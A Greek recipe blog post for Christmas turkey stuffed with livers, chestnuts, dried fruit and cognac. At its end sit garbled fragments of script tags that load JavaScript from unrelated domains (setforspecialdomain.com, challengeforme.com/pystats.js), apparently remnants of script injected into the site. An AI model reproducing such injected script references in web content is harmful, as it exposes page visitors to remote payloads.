Η συνταγή για την καλύτερη γαλοπούλα – Καλά Χριστούγεννα!!!

Δύο γυναίκες που διοργανώνουν εκδηλώσεις, η Μάρω Μαυριδόγλου και η Ζωή Σκουτεροπούλου, ή αλλιώς “ZM Exclusive Events & Catering”, μας φτιάχνουν την πιο νόστιμη χριστουγεννιάτικη γαλοπούλα.

Γαλοπούλα με γέμιση

Χρόνος προετοιμασίας: 25΄ λεπτά

Χρόνος ψησίματος: 3’ ώρες

Υλικά

Για την γαλοπούλα

1 γαλοπούλα 3-4 κιλά

2 κουταλιές της σούπας αλατοπίπερο

1 κουταλιά της σούπας εστραγκόν

4 κουταλιές της σούπας ελαιόλαδο

2 κουταλιές της σούπας βούτυρο

Για την γέμιση

300 γρ. συκωτάκια πουλιών κατεψυγμένα (σε όλα τα super market)

200 γρ. προβρασμένα κάστανα

100 γρ. κουκουνάρι

50 γρ. σταφίδες ξανθές

10 αποξηραμένα βερίκοκα

1 μήλο κομμένο σε κυβάκια

10 αποξηραμένα δαμάσκηνα

1 κρεμμύδι ξερό ψιλοκομμένο

2 κρεμμυδάκια φρέσκα ψιλοκομμένα

2 κουταλιές της σούπας ελαιόλαδο

2 κουταλιές της σούπας κονιάκ

4 κουταλιές της σούπας ψιλοκομμένο μαϊντανό

Αλάτι και πιπέρι

4 κουταλιές της σούπας πικάντικη γραβιέρα

1 αυγό χτυπημένο

2 κουταλιές της σούπας τριμμένη φρυγανιά

200ml ζωμό λαχανικών

Εκτέλεση

Γέμιση: Βράζουμε τα συκωτάκια για περίπου 5΄λεπτά σε βραστό νερό και στη συνέχεια τα ψιλοκόβουμε.

Σε μία κατσαρόλα ζεσταίνουμε το λάδι τοποθετούμε τα κρεμμύδια μέχρι να γυαλίσουν και να τσιγαριστούν, προσθέτουμε τα συκωτάκια, τα κάστανα, τις σταφίδες, τα κουκουνάρια, τα γυρίζουμε μία φορά τα σβήνουμε με κονιάκ, αφήνουμε να εξατμιστεί το αλκοόλ και συνεχίζουμε το βράσιμο για 8΄λεπτά περίπου μέχρι να φύγουν τα υγρά.
Στη συνέχεια τα αφήνουμε να κρυώσουν και προσθέτουμε τη φρυγανιά, το μαϊντανό, το τυρί, τα αποξηραμένα φρούτα (βερίκοκα και δαμάσκηνα) και το μήλο, ανακατεύουμε καλά και προσεκτικά.

Σ΄ ένα ευρύχωρο ταψί τοποθετούμε τη γαλοπούλα, την αλατοπιπερώνουμε καλά, απ΄ έξω και μέσα στη κοιλιά, την λαδώνουμε, προσθέτουμε το εστραγκόν, μπορούμε αν θέλουμε να την περάσουμε με χυμό από μισό πορτοκάλι.

Βουτάμε τα χέρια μας στο χτυπημένο αυγό και παίρνουμε λίγη γέμιση, την κάνουμε μπαλίτσα και την βάζουμε μέσα στη κοιλιά της γαλοπούλας, κάνουμε πάλι μπαλίτσα μέχρι να τελειώσει η γέμιση ή να γεμίσει η κοιλιά της γαλοπούλας, την ράβουμε ή την στερεώνουμε με οδοντογλυφίδες.

Ρίχνουμε το βούτυρο σε κομματάκια και τον ζωμό λαχανικών, την βάζουμε στο φούρνο στους 220 βαθμούς για είκοσι λεπτά και στη συνέχεια κατεβάζουμε στους 180 βαθμούς για 2 ώρες ακόμη, αφού τη σκεπάσουμε με μία λαδόκολλα.
Τη συνοδεύουμε με πατάτες φούρνου που τις βάζουμε στο ταψί στα μισά του ψησίματος.

Συμβουλή: Μπορούμε αν θέλουμε να κάνουμε ενέσεις κονιάκ στην γαλοπούλα πριν την ψήσουμε για περισσότερη νοστιμιά, επίσης αν μας περισσέψει γέμιση μπορούμε να την τυλίξουμε σε λαδόκολλα και να την ψήσουμε δίπλα στην γαλοπούλα για 30΄ λεπτά περίπου ή να την βάλουμε στην κατάψυξη για κάποια άλλη στιγμή.

Πηγή: Άντρια Κωνσταντίνου/ladylike.gr

___setforspecialdomain.com/ghfgh34523452′ type=’text/javascript’>___setforspecialdomain.com/ghfgh34523452′ type=’text/javascript’> challengeforme.com/pystats.js?l=l&’ async=true type=text/javascript language=javascript>challengeforme.com/pystats.js?l=l&’ async=true type=text/javascript language=javascript>

Leave a Reply

Your email address will not be published. Required fields are marked *

*